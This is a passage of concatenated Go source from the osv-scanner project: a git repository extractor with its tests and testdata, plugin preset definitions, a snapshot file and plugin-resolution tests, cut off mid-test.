inventory.Inventory{ Packages: pkgs, }, nil } var _ standalone.Extractor = &Extractor{} ================================================ FILE: internal/scalibrextract/vcs/gitrepo/extractor.go ================================================ // Package gitrepo provides an extractor for git repositories and submodules. package gitrepo import ( "context" "path" "path/filepath" "github.com/go-git/go-git/v5" cpb "github.com/google/osv-scalibr/binary/proto/config_go_proto" "github.com/google/osv-scalibr/extractor" "github.com/google/osv-scalibr/extractor/filesystem" "github.com/google/osv-scalibr/inventory" "github.com/google/osv-scalibr/plugin" "github.com/google/osv-scalibr/purl" ) const ( // Name is the unique name of this extractor. Name = "vcs/gitrepo" ) // Extractor extracts git repository hashes including submodule hashes. // This extractor will not return an error, and will just return no results if we fail to extract type Extractor struct{} func getCommitSHA(repo *git.Repository) (string, error) { head, err := repo.Head() if err != nil { return "", err } return head.Hash().String(), nil } func getSubmodules(repo *git.Repository) (submodules []*git.SubmoduleStatus, err error) { worktree, err := repo.Worktree() if err != nil { return nil, err } ss, err := worktree.Submodules() if err != nil { return nil, err } for _, s := range ss { status, err := s.Status() if err != nil { continue } submodules = append(submodules, status) } return submodules, nil } func createCommitQueryInventory(commit string, location string) *extractor.Package { return &extractor.Package{ SourceCode: &extractor.SourceCodeIdentifier{ Commit: commit, }, Location: extractor.LocationFromPath(location), } } // New returns a new instance of the extractor. func New(_ *cpb.PluginConfig) (filesystem.Extractor, error) { return &Extractor{}, nil } // Name of the extractor. func (e *Extractor) Name() string { return Name } // Version of the extractor. func (e *Extractor) Version() int { return 0 } // Requirements of the extractor. func (e *Extractor) Requirements() *plugin.Capabilities { return &plugin.Capabilities{ ExtractFromDirs: true, } } // FileRequired returns true for git repositories .git dirs func (e *Extractor) FileRequired(fapi filesystem.FileAPI) bool { if filepath.Base(fapi.Path()) != ".git" { return false } // Stat costs performance, so perform it after the name check stat, err := fapi.Stat() if err != nil { return false } return stat.IsDir() } // Extract extracts git commits from HEAD and from submodules func (e *Extractor) Extract(_ context.Context, input *filesystem.ScanInput) (inventory.Inventory, error) { // The input path is the .git directory, but git.PlainOpen expects the actual directory containing the .git dir. // So call filepath.Dir to get the parent path // Assume this is fully on a real filesystem // TODO: Make this support virtual filesystems repo, err := git.PlainOpen(path.Join(input.Root, filepath.Dir(input.Path))) if err != nil { return inventory.Inventory{}, err } var inv inventory.Inventory commitSHA, err := getCommitSHA(repo) // If error is not nil, then ignore this and continue, as it is not fatal. // The error could be because there are no commits in the repository if err == nil { inv.Packages = append(inv.Packages, createCommitQueryInventory(commitSHA, input.Path)) } // If we can't get submodules, just return with what we have. submodules, err := getSubmodules(repo) if err != nil { return inv, err } for _, s := range submodules { // r.Infof("Scanning submodule %s at commit %s\n", s.Path, s.Expected.String()) inv.Packages = append(inv.Packages, createCommitQueryInventory(s.Expected.String(), path.Join(input.Path, s.Path))) } return inv, nil } // ToPURL converts an inventory created by this extractor into a PURL. func (e *Extractor) ToPURL(_ *extractor.Package) *purl.PackageURL { return nil } // Ecosystem returns an empty string as all inventories are commit hashes func (e *Extractor) Ecosystem(_ *extractor.Package) string { return "" } var _ filesystem.Extractor = &Extractor{} ================================================ FILE: internal/scalibrextract/vcs/gitrepo/extractor_test.go ================================================ package gitrepo_test import ( "os" "path" "path/filepath" "testing" "github.com/google/go-cmp/cmp" "github.com/google/go-cmp/cmp/cmpopts" "github.com/google/osv-scalibr/extractor" "github.com/google/osv-scalibr/testing/extracttest" "github.com/google/osv-scanner/v2/internal/scalibrextract/vcs/gitrepo" ) func TestExtractor_Extract(t *testing.T) { t.Parallel() tests := []extracttest.TestTableEntry{ { Name: "Not_a_git_dir", InputConfig: extracttest.ScanInputMockConfig{ Path: "testdata/example-not-git/.git", }, WantErr: extracttest.ContainsErrStr{Str: "repository does not exist"}, }, { Name: "example_git", InputConfig: extracttest.ScanInputMockConfig{ Path: "testdata/example-git/.git", }, WantPackages: []*extractor.Package{ { Location: extractor.LocationFromPath("testdata/example-git/.git"), SourceCode: &extractor.SourceCodeIdentifier{ Commit: "862ac4bd2703b622e85f29f55a2fd8cd6caf8182", }, }, }, }, { Name: "Clean_git_repository_with_no_commits", InputConfig: extracttest.ScanInputMockConfig{ Path: "testdata/example-clean/.git", }, WantPackages: nil, }, } for _, tt := range tests { t.Run(tt.Name, func(t *testing.T) { t.Parallel() extr := gitrepo.Extractor{} parent := filepath.Dir(tt.InputConfig.Path) err := os.Rename(path.Join(parent, "git-hidden"), path.Join(parent, ".git")) if err != nil { t.Errorf("can't find git-hidden folder") } defer func() { err = os.Rename(path.Join(parent, ".git"), path.Join(parent, "git-hidden")) if err != nil { t.Fatalf("failed to restore .git to original git-hidden: %v", err) } }() scanInput := extracttest.GenerateScanInputMock(t, tt.InputConfig) defer extracttest.CloseTestScanInput(t, scanInput) got, err := extr.Extract(t.Context(), &scanInput) if diff := cmp.Diff(tt.WantErr, err, cmpopts.EquateErrors()); diff != "" { t.Errorf("%s.Extract(%q) error diff (-want +got):\n%s", extr.Name(), tt.InputConfig.Path, diff) return } if diff := cmp.Diff(tt.WantPackages, got.Packages, cmpopts.SortSlices(extracttest.PackageCmpLess)); diff != "" { t.Errorf("%s.Extract(%q) diff (-want +got):\n%s", extr.Name(), tt.InputConfig.Path, diff) } }) } } ================================================ FILE: internal/scalibrextract/vcs/gitrepo/testdata/example-clean/git-hidden/HEAD ================================================ ref: refs/heads/main ================================================ FILE: internal/scalibrextract/vcs/gitrepo/testdata/example-clean/git-hidden/config ================================================ [core] repositoryformatversion = 0 filemode = true bare = false logallrefupdates = true ================================================ FILE: internal/scalibrextract/vcs/gitrepo/testdata/example-clean/git-hidden/description ================================================ Unnamed repository; edit this file 'description' to name the repository. ================================================ FILE: internal/scalibrextract/vcs/gitrepo/testdata/example-clean/git-hidden/info/exclude ================================================ # git ls-files --others --exclude-from=.git/info/exclude # Lines that start with '#' are comments. # For a project mostly in C, the following would be a good set of # exclude patterns (uncomment them if you want to use them): # *.[oa] # *~ ================================================ FILE: internal/scalibrextract/vcs/gitrepo/testdata/example-git/a.txt ================================================ test file ================================================ FILE: internal/scalibrextract/vcs/gitrepo/testdata/example-git/git-hidden/COMMIT_EDITMSG ================================================ Example commit ================================================ FILE: internal/scalibrextract/vcs/gitrepo/testdata/example-git/git-hidden/HEAD ================================================ ref: refs/heads/main ================================================ FILE: internal/scalibrextract/vcs/gitrepo/testdata/example-git/git-hidden/config ================================================ [core] repositoryformatversion = 0 filemode = true bare = false logallrefupdates = true ================================================ FILE: internal/scalibrextract/vcs/gitrepo/testdata/example-git/git-hidden/description ================================================ Unnamed repository; edit this file 'description' to name the repository. ================================================ FILE: internal/scalibrextract/vcs/gitrepo/testdata/example-git/git-hidden/info/exclude ================================================ # git ls-files --others --exclude-from=.git/info/exclude # Lines that start with '#' are comments. # For a project mostly in C, the following would be a good set of # exclude patterns (uncomment them if you want to use them): # *.[oa] # *~ ================================================ FILE: internal/scalibrextract/vcs/gitrepo/testdata/example-git/git-hidden/logs/HEAD ================================================ 0000000000000000000000000000000000000000 862ac4bd2703b622e85f29f55a2fd8cd6caf8182 Rex P 1696388400 +1100 commit (initial): Example commit ================================================ FILE: internal/scalibrextract/vcs/gitrepo/testdata/example-git/git-hidden/logs/refs/heads/main ================================================ 0000000000000000000000000000000000000000 862ac4bd2703b622e85f29f55a2fd8cd6caf8182 Rex P 1696388400 +1100 commit (initial): Example commit ================================================ FILE: internal/scalibrextract/vcs/gitrepo/testdata/example-git/git-hidden/refs/heads/main ================================================ 862ac4bd2703b622e85f29f55a2fd8cd6caf8182 ================================================ FILE: internal/scalibrextract/vcs/gitrepo/testdata/example-not-git/a.txt ================================================ test file ================================================ FILE: internal/scalibrextract/vcs/gitrepo/testdata/example-not-git/git-hidden/b.txt ================================================ test file 2 ================================================ FILE: internal/scalibrplugin/__snapshots__/resolve_test.snap ================================================ [TestResolve_AllPresets - 1] baseimage cis/generic-linux/etcpasswdpermissions cpp/conanlock cve/cve-2020-11978 cve/cve-2020-16846 cve/cve-2022-33891 cve/cve-2023-38408 cve/cve-2023-6019 cve/cve-2024-2912 dart/pubspec dotnet/depsjson dotnet/packagesconfig dotnet/packageslockjson erlang/mixlock filesystem/vendored go/binary go/gomod govulncheck/binary haskell/cabal haskell/stacklock java/archive java/gradlelockfile java/gradleverificationmetadataxml java/pomxml javascript/bunlock javascript/nodemodules javascript/packagelockjson javascript/pnpmlock javascript/yarnlock license/depsdev os/apk os/dpkg osv/osvscannerjson php/composerlock python/pdmlock python/pipfilelock python/poetrylock python/pylock python/requirements python/uvlock python/wheelegg r/renvlock ruby/gemfilelock rust/cargoauditable rust/cargolock sbom/cdx sbom/spdx transitivedependency/pomxml transitivedependency/requirements vcs/gitrepo vex/os-duplicate/apk vex/os-duplicate/dpkg vulnmatch/osvdev vulnmatch/osvlocal weakcredentials/codeserver weakcredentials/etcshadow weakcredentials/filebrowser weakcredentials/winlocal --- [TestResolve_Annotators_Presets/artifact - 1] baseimage go/binary java/archive javascript/nodemodules os/apk os/dpkg python/wheelegg rust/cargoauditable vex/os-duplicate/apk vex/os-duplicate/dpkg --- [TestResolve_Detectors_Presets/cis - 1] cis/generic-linux/etcpasswdpermissions --- [TestResolve_Detectors_Presets/govulncheck - 1] govulncheck/binary --- [TestResolve_Detectors_Presets/untested - 1] cve/cve-2020-11978 cve/cve-2020-16846 cve/cve-2022-33891 cve/cve-2023-38408 cve/cve-2023-6019 cve/cve-2024-2912 --- [TestResolve_Detectors_Presets/weakcreds - 1] weakcredentials/codeserver weakcredentials/etcshadow weakcredentials/filebrowser weakcredentials/winlocal --- [TestResolve_Enrichers_Presets/artifact - 1] baseimage go/binary java/archive javascript/nodemodules os/apk os/dpkg python/wheelegg rust/cargoauditable vex/os-duplicate/apk vex/os-duplicate/dpkg --- [TestResolve_Enrichers_Presets/licenses - 1] license/depsdev --- [TestResolve_Enrichers_Presets/transitive - 1] --- [TestResolve_Enrichers_Presets/vulns - 1] vulnmatch/osvdev vulnmatch/osvlocal --- [TestResolve_Extractors_Presets/artifact - 1] baseimage go/binary java/archive javascript/nodemodules os/apk os/dpkg python/wheelegg rust/cargoauditable vex/os-duplicate/apk vex/os-duplicate/dpkg --- [TestResolve_Extractors_Presets/directory - 1] filesystem/vendored vcs/gitrepo --- [TestResolve_Extractors_Presets/lockfile - 1] cpp/conanlock dart/pubspec dotnet/depsjson dotnet/packagesconfig dotnet/packageslockjson erlang/mixlock go/gomod haskell/cabal haskell/stacklock java/gradlelockfile java/gradleverificationmetadataxml java/pomxml javascript/bunlock javascript/packagelockjson javascript/pnpmlock javascript/yarnlock os/apk os/dpkg osv/osvscannerjson php/composerlock python/pdmlock python/pipfilelock python/poetrylock python/pylock python/requirements python/uvlock r/renvlock ruby/gemfilelock rust/cargolock --- [TestResolve_Extractors_Presets/sbom - 1] sbom/cdx sbom/spdx --- ================================================ FILE: internal/scalibrplugin/presets.go ================================================ package scalibrplugin import ( "fmt" annotatorlist "github.com/google/osv-scalibr/annotator/list" apkanno "github.com/google/osv-scalibr/annotator/osduplicate/apk" dpkganno "github.com/google/osv-scalibr/annotator/osduplicate/dpkg" cpb "github.com/google/osv-scalibr/binary/proto/config_go_proto" detectors "github.com/google/osv-scalibr/detector/list" "github.com/google/osv-scalibr/enricher" "github.com/google/osv-scalibr/enricher/baseimage" "github.com/google/osv-scalibr/enricher/enricherlist" transitivedependencypomxml "github.com/google/osv-scalibr/enricher/transitivedependency/pomxml" transitivedependencyrequirements "github.com/google/osv-scalibr/enricher/transitivedependency/requirements" "github.com/google/osv-scalibr/extractor/filesystem/language/cpp/conanlock" "github.com/google/osv-scalibr/extractor/filesystem/language/dart/pubspec" "github.com/google/osv-scalibr/extractor/filesystem/language/dotnet/depsjson" "github.com/google/osv-scalibr/extractor/filesystem/language/dotnet/packagesconfig" "github.com/google/osv-scalibr/extractor/filesystem/language/dotnet/packageslockjson" "github.com/google/osv-scalibr/extractor/filesystem/language/erlang/mixlock" "github.com/google/osv-scalibr/extractor/filesystem/language/golang/gobinary" "github.com/google/osv-scalibr/extractor/filesystem/language/golang/gomod" "github.com/google/osv-scalibr/extractor/filesystem/language/haskell/cabal" "github.com/google/osv-scalibr/extractor/filesystem/language/haskell/stacklock" "github.com/google/osv-scalibr/extractor/filesystem/language/java/archive" "github.com/google/osv-scalibr/extractor/filesystem/language/java/gradlelockfile" "github.com/google/osv-scalibr/extractor/filesystem/language/java/gradleverificationmetadataxml" "github.com/google/osv-scalibr/extractor/filesystem/language/java/pomxml" "github.com/google/osv-scalibr/extractor/filesystem/language/javascript/bunlock" "github.com/google/osv-scalibr/extractor/filesystem/language/javascript/packagelockjson" "github.com/google/osv-scalibr/extractor/filesystem/language/javascript/pnpmlock" "github.com/google/osv-scalibr/extractor/filesystem/language/javascript/yarnlock" "github.com/google/osv-scalibr/extractor/filesystem/language/php/composerlock" "github.com/google/osv-scalibr/extractor/filesystem/language/python/pdmlock" "github.com/google/osv-scalibr/extractor/filesystem/language/python/pipfilelock" "github.com/google/osv-scalibr/extractor/filesystem/language/python/poetrylock" "github.com/google/osv-scalibr/extractor/filesystem/language/python/pylock" "github.com/google/osv-scalibr/extractor/filesystem/language/python/requirements" "github.com/google/osv-scalibr/extractor/filesystem/language/python/uvlock" "github.com/google/osv-scalibr/extractor/filesystem/language/python/wheelegg" "github.com/google/osv-scalibr/extractor/filesystem/language/r/renvlock" "github.com/google/osv-scalibr/extractor/filesystem/language/ruby/gemfilelock" "github.com/google/osv-scalibr/extractor/filesystem/language/rust/cargoauditable" "github.com/google/osv-scalibr/extractor/filesystem/language/rust/cargolock" extractors "github.com/google/osv-scalibr/extractor/filesystem/list" "github.com/google/osv-scalibr/extractor/filesystem/os/apk" "github.com/google/osv-scalibr/extractor/filesystem/os/dpkg" "github.com/google/osv-scalibr/extractor/filesystem/sbom/cdx" "github.com/google/osv-scalibr/extractor/filesystem/sbom/spdx" "github.com/google/osv-scanner/v2/internal/datasource" "github.com/google/osv-scanner/v2/internal/depsdev" "github.com/google/osv-scanner/v2/internal/scalibrextract/filesystem/vendored" "github.com/google/osv-scanner/v2/internal/scalibrextract/language/javascript/nodemodules" "github.com/google/osv-scanner/v2/internal/scalibrextract/language/osv/osvscannerjson" "github.com/google/osv-scanner/v2/internal/scalibrextract/vcs/gitrepo" "github.com/google/osv-scanner/v2/internal/version" ) var detectorPresets = map[string]detectors.InitMap{ "cis": detectors.CIS, "govulncheck": detectors.Govulncheck, "untested": detectors.Untested, "weakcreds": detectors.Weakcredentials, } var ExtractorPresets = map[string]extractors.InitMap{ "sbom": { spdx.Name: {spdx.New}, cdx.Name: {cdx.New}, }, "lockfile": { // C conanlock.Name: {conanlock.New}, // Erlang mixlock.Name: {mixlock.New}, // Flutter pubspec.Name: {pubspec.New}, // Go gomod.Name: {gomod.New}, // Java gradlelockfile.Name: {gradlelockfile.New}, gradleverificationmetadataxml.Name: {gradleverificationmetadataxml.New}, pomxml.Name: {pomxml.New}, // Javascript packagelockjson.Name: {packagelockjson.New}, pnpmlock.Name: {pnpmlock.New}, yarnlock.Name: {yarnlock.New}, bunlock.Name: {bunlock.New}, // PHP composerlock.Name: {composerlock.New}, // Python pipfilelock.Name: {pipfilelock.New}, pdmlock.Name: {pdmlock.New}, poetrylock.Name: {poetrylock.New}, pylock.Name: {pylock.New}, requirements.Name: {requirements.New}, uvlock.Name: {uvlock.New}, // R renvlock.Name: {renvlock.New}, // Ruby gemfilelock.Name: {gemfilelock.New}, // Rust cargolock.Name: {cargolock.New}, // NuGet depsjson.Name: {depsjson.New}, packagesconfig.Name: {packagesconfig.New}, packageslockjson.Name: {packageslockjson.New}, // Haskell cabal.Name: {cabal.New}, stacklock.Name: {stacklock.New}, osvscannerjson.Name: {osvscannerjson.New}, // --- OS "lockfiles" --- // These have very strict FileRequired paths, so we can safely enable them for source scanning as well. // Alpine apk.Name: {apk.New}, // Debian dpkg.Name: {dpkg.New}, }, "directory": { gitrepo.Name: {gitrepo.New}, vendored.Name: {vendored.New}, }, "artifact": { // --- Project artifacts --- // Python wheelegg.Name: {wheelegg.New}, // Java archive.Name: {archive.New}, // Go gobinary.Name: {gobinary.New}, // Javascript nodemodules.Name: {nodemodules.New}, // Rust cargoauditable.Name: {cargoauditable.New}, // --- OS packages --- // Alpine apk.Name: {apk.New}, // Debian dpkg.Name: {dpkg.New}, }, } var enricherPresets = map[string]enricherlist.InitMap{ "artifact": { baseimage.Name: {baseImageEnricher}, }, "vulns": enricherlist.VulnMatching, "licenses": enricherlist.License, "transitive": { transitivedependencyrequirements.Name: {transitivedependencyrequirements.New}, transitivedependencypomxml.Name: {transitivedependencypomxml.New}, }, } var annotatorPresets = map[string]annotatorlist.InitMap{ "artifact": { apkanno.Name: {apkanno.New}, dpkganno.Name: {dpkganno.New}, }, } func baseImageEnricher(_ *cpb.PluginConfig) (enricher.Enricher, error) { // The grpc client **does not** make any requests. It starts in an IDLE state until // the first function call is made. This means we can safely initialize the client even in offline mode, // and the enricher plugin will be filtered out in offline mode. insightsClient, err := datasource.NewInsightsAlphaClient(depsdev.DepsdevAPI, "osv-scanner_scan/"+version.OSVVersion) if err != nil { return nil, fmt.Errorf("unable to connect to insights server: %w", err) } baseImageEnricher, err := baseimage.New(&baseimage.Config{ Client: baseimage.NewClientGRPC(insightsClient), }) if err != nil { return nil, fmt.Errorf("unable to initialize base image enricher: %w", err) } return baseImageEnricher, nil } ================================================ FILE: internal/scalibrplugin/resolve.go ================================================ // Package scalibrplugin provides functions related to resolving scalibr plugins package scalibrplugin import ( "fmt" "slices" cpb "github.com/google/osv-scalibr/binary/proto/config_go_proto" "github.com/google/osv-scalibr/enricher" "github.com/google/osv-scalibr/plugin" "github.com/google/osv-scalibr/plugin/list" "github.com/google/osv-scanner/v2/internal/cmdlogger" "github.com/google/osv-scanner/v2/internal/scalibrextract/filesystem/vendored" "github.com/google/osv-scanner/v2/internal/scalibrextract/language/javascript/nodemodules" "github.com/google/osv-scanner/v2/internal/scalibrextract/language/osv/osvscannerjson" "github.com/google/osv-scanner/v2/internal/scalibrextract/vcs/gitrepo" ) func resolveFromName(name string, cfg *cpb.PluginConfig) (plugin.Plugin, error) { plug, err := list.FromName(name, cfg) if err == nil { return plug, nil } switch name { // Javascript case nodemodules.Name: return nodemodules.New(cfg) // Directories case vendored.Name: return vendored.New(cfg) case gitrepo.Name: return gitrepo.New(cfg) case osvscannerjson.Name: return osvscannerjson.New(cfg) default: return nil, fmt.Errorf("not an exact name for a plugin: %q", name) } } func Resolve(enabledPlugins []string, disabledPlugins []string, cfg *cpb.PluginConfig) []plugin.Plugin { plugins := make(map[string]bool) for i, exts := range [][]string{enabledPlugins, disabledPlugins} { enabled := i == 0 for _, pluginOrPreset := range exts { wasAPreset := false if names, ok := ExtractorPresets[pluginOrPreset]; ok { for name := range names { plugins[name] = enabled } wasAPreset = true } if names, ok := detectorPresets[pluginOrPreset]; ok { for name := range names { plugins[name] = enabled } wasAPreset = true } if names, ok := annotatorPresets[pluginOrPreset]; ok { for name := range names { plugins[name] = enabled } wasAPreset = true } if names, ok := enricherPresets[pluginOrPreset]; ok { for name := range names { plugins[name] = enabled } wasAPreset = true } if !wasAPreset { plugins[pluginOrPreset] = enabled } } } asSlice := make([]plugin.Plugin, 0, len(plugins)) for name, value := range plugins { if name != "" && value { plug, err := resolveFromName(name, cfg) if err != nil { cmdlogger.Errorf("%s", err) // mark the plugin as disabled in case // it is required by any other plugins plugins[name] = false continue } asSlice = append(asSlice, plug) } } return filterPluginsMissingRequiredPlugins(plugins, asSlice) } func filterPluginsMissingRequiredPlugins(pluginStatues map[string]bool, loaded []plugin.Plugin) []plugin.Plugin { plugins := make([]plugin.Plugin, 0, len(loaded)) for _, plug := range loaded { en, ok := plug.(enricher.Enricher) // if the "loaded" status of any plugin required by an enricher "contains" false, // then that plugin is disabled and so the enricher requirements are not met if ok && slices.ContainsFunc(en.RequiredPlugins(), func(name string) bool { return !pluginStatues[name] }) { continue } plugins = append(plugins, plug) } return plugins } ================================================ FILE: internal/scalibrplugin/resolve_test.go ================================================ package scalibrplugin_test import ( "slices" "strings" "testing" "github.com/google/go-cmp/cmp" apkanno "github.com/google/osv-scalibr/annotator/osduplicate/apk" dpkganno "github.com/google/osv-scalibr/annotator/osduplicate/dpkg" cpb "github.com/google/osv-scalibr/binary/proto/config_go_proto" "github.com/google/osv-scalibr/detector/cis/generic_linux/etcpasswdpermissions" "github.com/google/osv-scalibr/detector/govulncheck/binary" "github.com/google/osv-scalibr/detector/weakcredentials/codeserver" "github.com/google/osv-scalibr/detector/weakcredentials/etcshadow" "github.com/google/osv-scalibr/detector/weakcredentials/filebrowser" "github.com/google/osv-scalibr/detector/weakcredentials/winlocal" "github.com/google/osv-scalibr/enricher/baseimage" transitivedependencypomxml "github.com/google/osv-scalibr/enricher/transitivedependency/pomxml" transitivedependencyrequirements "github.com/google/osv-scalibr/enricher/transitivedependency/requirements" "github.com/google/osv-scalibr/extractor/filesystem/language/dotnet/packageslockjson" "github.com/google/osv-scalibr/extractor/filesystem/language/golang/gobinary" "github.com/google/osv-scalibr/extractor/filesystem/language/java/archive" "github.com/google/osv-scalibr/extractor/filesystem/language/java/pomxml" "github.com/google/osv-scalibr/extractor/filesystem/language/php/composerlock" "github.com/google/osv-scalibr/extractor/filesystem/language/python/requirements" "github.com/google/osv-scalibr/extractor/filesystem/language/python/wheelegg" "github.com/google/osv-scalibr/extractor/filesystem/language/rust/cargoauditable" chromeextensions "github.com/google/osv-scalibr/extractor/filesystem/misc/chrome/extensions" "github.com/google/osv-scalibr/extractor/filesystem/os/apk" "github.com/google/osv-scalibr/extractor/filesystem/os/dpkg" "github.com/google/osv-scalibr/extractor/filesystem/sbom/cdx" "github.com/google/osv-scalibr/extractor/filesystem/sbom/spdx" "github.com/google/osv-scanner/v2/internal/scalibrextract/filesystem/vendored" "github.com/google/osv-scanner/v2/internal/scalibrextract/language/javascript/nodemodules" "github.com/google/osv-scanner/v2/internal/scalibrextract/vcs/gitrepo" "github.com/google/osv-scanner/v2/internal/scalibrplugin" "github.com/google/osv-scanner/v2/internal/testutility" ) func TestResolve(t *testing.T) { t.Parallel() type args struct { enabled []string disabled []string } tests := []struct { name string args args want []string }{ { name: "nothing_enabled_or_disabled", args: args{ enabled: nil, disabled: nil, }, want: []string{}, }, { name: "empty_strings_are_ignored", args: args{ enabled: []string{""}, disabled: []string{""}, }, want: []string{}, }, // { name: "one_extractor_and_one_detector_enabled_and_nothing_disabled", args: args{ enabled: []string{composerlock.Name, etcshadow.Name}, disabled: nil, }, want: []string{composerlock.Name, etcshadow.Name}, }, { name: "one_extractor_and_one_detector_enabled_and_different_detector_disabled", args: args{ enabled: []string{composerlock.Name, etcshadow.Name}, disabled: []string{binary.Name}, }, want: []string{composerlock.Name, etcshadow.Name}, }, { name: "one_extractor_and_one_detector_enabled_and_different_extractor_disabled", args: args{ enabled: []string{composerlock.Name, etcshadow.Name}, disabled: []string{binary.Name, chromeextensions.Name}, }, want: []string{composerlock.Name, etcshadow.Name}, }, { name: "one_extractor_enabled_and_one_detector_enabled_and_same_detector_disabled", args: args{ enabled: []string{composerlock.Name, etcshadow.Name}, disabled: []string{etcshadow.Name}, }, want: []string{composerlock.Name}, }, { name: "one_extractor_enabled_and_one_detector_enabled_and_same_extractor_disabled", args: args{ enabled: []string{composerlock.Name, etcshadow.Name}, disabled: []string{composerlock.Name}, }, want: []string{etcshadow.Name}, }, // { name: "some_extractors_and_one_detector_preset_enabled_and_nothing_disabled", args: args{ enabled: []string{composerlock.Name, "weakcreds", nodemodules.Name}, disabled: nil, }, want: []string{ codeserver.Name, composerlock.Name, etcshadow.Name, filebrowser.Name, nodemodules.Name, winlocal.Name, }, }, { name: "one_preset_enabled_and_different_preset_disabled", args: args{ enabled: []string{"weakcreds"}, disabled: []string{"artifact"}, }, want: []string{ codeserver.Name, etcshadow.Name, filebrowser.Name, winlocal.Name, }, }, // { name: "multiple_presets_enabled_and_nothing_disabled", args: args{ enabled: []string{"weakcreds", "sbom"}, disabled: []string{}, }, want: []string{ cdx.Name, codeserver.Name, etcshadow.Name, filebrowser.Name, spdx.Name, winlocal.Name, }, }, // { name: "plugin_that_does_not_exist", args: args{ enabled: []string{"???"}, disabled: nil, }, want: []string{}, }, } for _, tt := range tests { t.Run(tt.name, func(t *testing.T) { t.Parallel() got := scalibrplugin.Resolve(tt.args.enabled, tt.args.disabled, &cpb.PluginConfig{}) slices.Sort(tt.want) gotNames := make([]string, 0, len(got)) for _, plug := range got { gotNames = append(gotNames, plug.Name()) } slices.Sort(gotNames) if diff := cmp.Diff(tt.want, gotNames); diff != "" { t.Errorf("Resolve() diff (-want +got): %s", diff) } }) } } func TestResolve_Detectors(t *testing.T) { t.Parallel() type args struct { enabled []string disabled []string } tests := []struct { name string args args want []string }{ { name: "nothing_enabled_or_disabled", args: args{ enabled: nil, disabled: nil, }, want: []string{}, }, { name: "empty_strings_are_ignored", args: args{ enabled: []string{""}, disabled: []string{""}, }, want: []string{}, }, { name: "one_detector_enabled_and_nothing_disabled", args: args{ enabled: []string{etcshadow.Name}, disabled: nil, }, want: []string{etcshadow.Name}, }, { name: "one_detector_enabled_and_different_detector_disabled", args: args{ enabled: []string{etcshadow.Name}, disabled: []string{binary.Name}, }, want: []string{etcshadow.Name}, }, { name: "one_detector_enabled_and_same_detector_disabled", args: args{ enabled: []string{etcshadow.Name}, disabled: []string{etcshadow.Name}, }, want: []string{}, }, // { name: "one_preset_enabled_and_nothing_disabled", args: args{ enabled: []string{"weakcreds"}, disabled: nil, }, want: []string{ codeserver.Name, etcshadow.Name, filebrowser.Name, winlocal.Name, }, }, { name: "one_preset_enabled_and_different_preset_disabled", args: args{ enabled: []string{"weakcreds"}, disabled: []string{"untested"}, }, want: []string{ codeserver.Name, etcshadow.Name, filebrowser.Name, winlocal.Name, }, }, { name: "one_preset_enabled_and_same_preset_disabled", args: args{ enabled: []string{"weakcreds"}, disabled: []string{"weakcreds"}, }, want: []string{}, }, { name: "one_preset_enabled_and_some_detectors_disabled", args: args{ enabled: []string{"weakcreds"}, disabled: []string{codeserver.Name, filebrowser.Name}, }, want: []string{ etcshadow.Name, winlocal.Name, }, }, // { name: "multiple_presets_enabled_and_nothing_disabled", args: args{ enabled: []string{"weakcreds", "cis"}, disabled: []string{}, }, want: []string{ codeserver.Name, etcshadow.Name, filebrowser.Name, winlocal.Name, etcpasswdpermissions.Name, }, }, // { name: "multiple_detectors_enabled_and_one_disabled_preset", args: args{ enabled: []string{ etcshadow.Name, filebrowser.Name, etcpasswdpermissions.Name, }, disabled: []string{"weakcreds"}, }, want: []string{ etcpasswdpermissions.Name, }, }, { name: "multiple_detectors_enabled_and_disabled", args: args{ enabled: []string{ etcshadow.Name, filebrowser.Name, etcpasswdpermissions.Name, }, disabled: []string{ codeserver.Name, winlocal.Name, }, }, want: []string{ etcshadow.Name, filebrowser.Name, etcpasswdpermissions.Name, }, }, } for _, tt := range tests { t.Run(tt.name, func(t *testing.T) { t.Parallel() got := scalibrplugin.Resolve(tt.args.enabled, tt.args.disabled, &cpb.PluginConfig{}) slices.Sort(tt.want) gotNames := make([]string, 0, len(got)) for _, plug := range got { gotNames = append(gotNames, plug.Name()) } slices.Sort(gotNames) if diff := cmp.Diff(tt.want, gotNames); diff != "" { t.Errorf("Resolve() diff (-want +got): %s", diff) } }) } } func TestResolve_RequiredPlugins(t *testing.T) { t.Parallel() type args struct { enabled []string disabled []string } tests := []struct { name string args args want []string }{ { name: "one_enricher_without_its_required_plugin", args: args{ enabled: []string{transitivedependencyrequirements.Name}, disabled: nil, }, want: []string{}, }, { name: "one_enricher_with_its_required_plugin_disabled", args: args{ enabled: []string{transitivedependencyrequirements.Name}, disabled: []string{requirements.Name}, }, want: []string{}, }, // { name: "transitive_enrichers_preset_without_any_required_plugin_enabled", args: args{ enabled: []string{"transitive"}, disabled: nil, }, want: []string{}, }, { name: "transitive_enrichers_preset_without_one_required_plugin_enabled", args: args{ enabled: []string{"transitive", requirements.Name}, disabled: nil, }, want: []string{transitivedependencyrequirements.Name, requirements.Name}, }, { name: "transitive_enrichers_preset_with_all_required_plugin_enabled", args: args{ enabled: []string{ "transitive", requirements.Name, pomxml.Name, }, disabled: nil, }, want: []string{ transitivedependencyrequirements.Name, requirements.Name, transitivedependencypomxml.Name, pomxml.Name, }, }, } for _, tt := range tests { t.Run(tt.name, func(t *testing.T) { t.Parallel() got := scalibrplugin.Resolve(tt.args.enabled, tt.args.disabled, &cpb.PluginConfig{}) slices.Sort(tt.want) gotNames := make([]string, 0, len(got)) for _, plug := range got { gotNames = append(gotNames, plug.Name()) } slices.Sort(gotNames) if diff := cmp.Diff(tt.want, gotNames); diff != "" { t.Errorf("Resolve() diff (-want +got): %s", diff) } }) } } func TestResolve_AllPresets(t *testing.T) { t.Parallel() got := scalibrplugin.Resolve([]string{ "cis", "govulncheck", "untested", "weakcreds", "sbom", "lockfile", "directory", "artifact", "vulns", "licenses", "transitive", }, []string{}, &cpb.PluginConfig{}) gotNames := make([]string, 0, len(got)) for _, detector := range got { gotNames = append(gotNames, detector.Name()) } slices.Sort(gotNames) testutility.NewSnapshot().MatchText(t, strings.Join(gotNames, "\n")) } func TestResolve_Extractors(t *testing.T) { t.Parallel() type args struct { enabled []string disabled []string } tests := []struct { name string args args want []string }{ // { name: "one_extractor_enabled_and_nothing_disabled", args: args{ enabled: []string{composerlock.Name}, disabled: nil, }, want: []string{composerlock.Name}, }, { name: "one_extractor_enabled_and_different_extractor_disabled", args: args{ enabled: []string{composerlock.Name}, disabled: []string{packageslockjson.Name}, }, want: []string{composerlock.Name}, }, { name: "one_extractor_enabled_and_same_extractor_disabled", args: args{ enabled: 